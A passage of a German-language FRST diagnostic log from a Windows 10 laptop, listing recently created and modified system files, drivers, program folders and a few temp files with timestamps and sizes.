C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-06-14 20:30 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-06-14 20:30 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-06-14 20:30 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2017-06-14 20:30 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-06-14 20:30 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe 2017-06-14 20:30 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2017-06-14 20:30 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll 2017-06-14 20:30 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-06-14 20:30 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-06-14 20:30 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-06-14 20:30 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-06-14 20:30 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-06-14 20:30 - 
2017-06-08 09:08 - 2017-06-08 09:08 - 00002280 _____ C:\WINDOWS\System32\Tasks\RTKCPL 2017-06-08 09:08 - 2017-06-08 09:08 - 00002274 _____ C:\WINDOWS\System32\Tasks\DolbySelectorTask 2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\Lenovo 2017-06-08 09:05 - 2017-06-08 09:05 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-06-08 09:01 - 2017-06-08 09:06 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-06-08 09:01 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines 2017-06-08 09:00 - 2017-07-02 20:23 - 02324546 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-06-08 09:00 - 2017-07-02 20:17 - 00000000 ____D C:\ProgramData\Synaptics 2017-06-08 09:00 - 2017-06-30 07:49 - 00000000 ____D C:\Users\ararat 2017-06-08 09:00 - 2017-06-08 09:07 - 00000000 ____D C:\Users\DefaultAppPool 2017-06-08 09:00 - 2017-06-08 09:00 - 02011386 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL 
C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Vorlagen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Startmenü 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Netzwerkumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Lokale Einstellungen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Eigene Dateien 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Druckumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Videos 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Musik 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Bilder 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Verlauf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WUDFUsbccidDriver_01_11_00.Wdf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_wbf_vfs_lvcmn_01_11_00.Wdf 2017-06-08 09:00 - 2017-05-01 22:51 - 06437312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 02479552 _____ (NVIDIA Corporation) 
C:\WINDOWS\system32\nvsvc64.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00548800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00146880 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\oemdspif.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll 2017-06-08 09:00 - 2017-04-25 23:11 - 07944687 _____ C:\WINDOWS\system32\nvcoproc.bin 2017-06-08 08:59 - 2017-07-02 20:18 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2017-06-08 08:59 - 2017-07-02 20:18 - 00000000 ____D C:\ProgramData\NVIDIA 2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\ProgramData\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Intel 2017-06-08 08:59 - 2017-06-08 09:00 - 00000000 ____D C:\Program Files\Synaptics 2017-06-08 08:59 - 2017-06-08 08:59 - 00044875 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip 2017-06-08 08:59 - 2017-06-08 08:59 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-06-08 
08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\system32\DAX2 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\Program Files\Realtek 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin 2017-06-08 08:59 - 2017-05-01 22:52 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat 2017-06-08 08:59 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2017-06-08 08:59 - 2016-11-02 00:05 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL 2017-06-08 08:58 - 2017-07-02 20:18 - 04916088 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-06-08 08:58 - 2017-06-29 22:06 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-06-05 22:24 - 2017-06-12 21:54 - 00000000 ___DC C:\WINDOWS\Panther 2017-06-05 10:50 - 2017-06-05 10:50 - 00257864 _____ (Lenovo Group Limited) C:\WINDOWS\system32\iMDriverHelper.dll ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2017-07-02 20:23 - 2017-03-20 06:41 - 01016364 _____ C:\WINDOWS\system32\perfh007.dat 2017-07-02 20:23 - 2017-03-20 06:41 - 00233256 _____ C:\WINDOWS\system32\perfc007.dat 2017-07-02 20:23 - 2016-11-19 13:21 - 00132855 _____ C:\WINDOWS\system32\InstallUtil.InstallLog 2017-07-02 20:18 - 2016-02-11 22:02 - 00000000 __SHD C:\Users\ararat\IntelGraphicsProfiles 2017-07-02 20:17 - 2017-03-18 13:40 - 00524288 _____ C:\WINDOWS\system32\config\BBI 2017-07-02 19:48 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-07-02 19:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-06-27 22:23 - 2016-02-23 22:19 - 00000000 ____D C:\Program Files (x86)\Dropbox 2017-06-27 21:00 - 2016-02-23 23:03 - 00000321 _____ C:\Users\ararat\Documents\BIMx_Export_Log.txt 2017-06-27 21:00 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Graphisoft 2017-06-27 20:26 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Documents\BIMx 2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Spotify 2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Local\Spotify 2017-06-22 09:12 - 2016-02-23 22:22 - 00000000 ___RD C:\Users\ararat\Dropbox 2017-06-22 09:11 - 2016-10-25 19:04 - 00000000 ____D C:\Users\ararat\Documents\Tickets 2017-06-21 22:52 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-06-19 22:57 - 2016-02-23 22:19 - 00000000 ____D C:\Users\ararat\AppData\Local\Dropbox 2017-06-19 21:59 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-06-15 19:05 - 2016-02-12 20:16 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-06-14 22:12 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-06-14 20:33 - 2016-02-11 21:55 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-06-14 20:32 - 2017-03-18 22:51 - 00000000 ____D 
C:\WINDOWS\CbsTemp 2017-06-14 20:32 - 2016-02-11 21:55 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-06-14 20:22 - 2016-02-12 20:18 - 00002435 _____ C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-06-14 20:22 - 2016-02-12 20:18 - 00000000 ___RD C:\Users\ararat\OneDrive 2017-06-13 08:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-06-13 08:53 - 2016-02-12 20:16 - 00000000 ____D C:\Users\ararat\AppData\Local\Packages 2017-06-12 21:57 - 2016-09-17 15:35 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Skype 2017-06-12 21:54 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-06-08 09:58 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-06-08 09:54 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-06-08 09:54 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\inetsrv 2017-06-08 09:48 - 2017-03-18 22:59 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00562176 _____ (Microsoft 
Corporation) C:\WINDOWS\SysWOW64\mqutil.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe 2017-06-08 09:48 - 2017-03-18 22:59 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe 2017-06-08 09:48 - 2017-03-18 22:59 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00013312 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\iisrstap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cngkeyhelper.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof 2017-06-08 09:48 - 2017-03-18 22:56 - 01380352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys 2017-06-08 09:48 - 2017-03-18 22:56 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe 2017-06-08 09:48 - 2017-03-18 22:56 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe 2017-06-08 09:48 - 2017-03-18 22:56 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll 2017-06-08 09:48 - 2017-03-18 
22:56 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof 2017-06-08 09:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-06-08 09:13 - 2016-09-24 14:37 - 00000000 ____D C:\Program Files (x86)\SunplusIT Integrated Camera 2017-06-08 09:11 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-06-08 09:10 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-06-08 09:10 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-06-08 09:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-06-08 09:08 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries 2017-06-08 09:08 - 2016-02-12 19:33 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat 2017-06-08 09:06 - 2017-05-18 08:30 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-06-08 09:06 - 2017-05-01 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rhinoceros 5 2017-06-08 09:06 - 2016-07-14 22:45 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.2 2017-06-08 09:06 - 2016-07-09 22:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2017-06-08 09:06 - 2016-04-21 18:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 3ds Max 2015 2017-06-08 09:06 - 2016-04-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 2017-06-08 09:06 - 2016-03-27 18:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Master Collection CS6 2017-06-08 09:06 - 2016-03-23 19:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start 
Menu\Programs\ScummVM 2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WibuKey 2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter 2017-06-08 09:06 - 2016-02-23 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRAPHISOFT 2017-06-08 09:06 - 2016-02-23 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-06-08 09:06 - 2016-02-21 19:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-06-08 09:06 - 2016-02-13 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRWare Iron (64-Bit) 2017-06-08 09:06 - 2016-02-12 20:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dolby 2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\SysWOW64\NV 2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\system32\NV 2017-06-08 09:05 - 2015-10-30 08:28 - 00000000 ____D C:\Users\Default.migrated 2017-06-08 09:02 - 2017-05-28 09:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-06-08 09:02 - 2017-03-20 06:42 - 00000000 ____D C:\WINDOWS\OCR 2017-06-08 09:02 - 2017-03-20 06:41 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\IME 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\IME 2017-06-08 09:02 - 
2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\schemas 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-06-08 09:02 - 2017-03-13 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Itoo Software 2017-06-08 09:02 - 2016-11-15 23:08 - 00000000 ___HD C:\WINDOWS\system32\WLANProfiles 2017-06-08 09:02 - 2016-10-22 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexicon 2017-06-08 09:02 - 2016-10-22 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia 2017-06-08 09:02 - 2016-07-15 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo 2017-06-08 09:02 - 2016-05-07 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel 2017-06-08 09:02 - 2016-04-21 21:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group 2017-06-08 09:02 - 2016-04-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk Backburner 2015 2017-06-08 09:02 - 2016-02-12 20:24 - 00000000 ____D C:\WINDOWS\SysWOW64\sda 2017-06-08 09:02 - 2016-02-11 22:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files\Windows Sidebar 2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv 2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-06-08 09:01 - 2017-03-13 19:32 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Itoo Software 2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Help 2017-06-08 09:00 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2017-06-08 08:59 - 2016-02-11 20:23 - 00000000 ____D C:\Intel 2017-06-08 08:41 - 2017-03-20 07:06 - 
00000000 ___HD C:\$WINDOWS.~BT 2017-06-04 11:47 - 2016-10-16 17:44 - 00000000 ____D C:\Users\ararat\Documents\Wohnung 2017-06-03 08:32 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-06-03 08:32 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2016-08-02 21:46 - 2017-04-03 21:08 - 0000132 _____ () C:\Users\ararat\AppData\Roaming\Adobe PNG Format CS6 Prefs 2016-11-04 00:45 - 2017-03-10 23:52 - 0001456 _____ () C:\Users\ararat\AppData\Local\Adobe Save for Web 13.0 Prefs 2017-07-02 20:17 - 2017-07-02 20:17 - 0000000 ____H () C:\ProgramData\cm-lock 2017-06-08 08:59 - 2017-06-08 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl Einige Dateien in TEMP: ==================== 2017-06-27 22:40 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo3360657184.dll 2017-06-26 21:53 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo738377283.dll ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für 